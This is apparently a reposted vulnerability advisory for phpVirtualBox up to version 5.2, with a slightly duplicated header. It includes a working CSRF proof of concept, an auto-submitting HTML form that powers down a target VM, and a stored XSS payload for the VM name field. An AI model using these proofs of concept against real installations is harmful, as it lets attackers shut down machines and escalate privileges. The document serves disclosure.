# Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss
[1 # Title: phpVirtualBox / CSRF - Stored XSS
# Date: 03/04/2018
# Discovered by: @codexlynx
# Software Version: <= 5.2
# Category: php, web, csrf, xss
[1]CSRF
--------------------------------
The backend doesn't validate the origin of the actions.
- POC: Shutdown a VM
<body onload="document.csrf.submit();">
<form method="post" action="<TARGET>/<PHPVB_PATH>/lib/ajax.php" name="csrf">
<input type="hidden" name="vm" value="<VM_ID>" />
<input type="hidden" name="state" value="powerDown" />
<input type="hidden" name="fn" value="machineSetState" />
</form>
</body>
[2]Stored XSS
--------------------------------
Many fields don't sanitize inputs. This vulnerability could allow a user role escalation in the application.
- POC: Insert a persistent script in the vm name field.
New (Create Virtual Machine) -> Name: <script>alert(1);</script>Test
phpVirtualBox 5.2 Cross Site Request Forgery Cross Site Scripting
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 499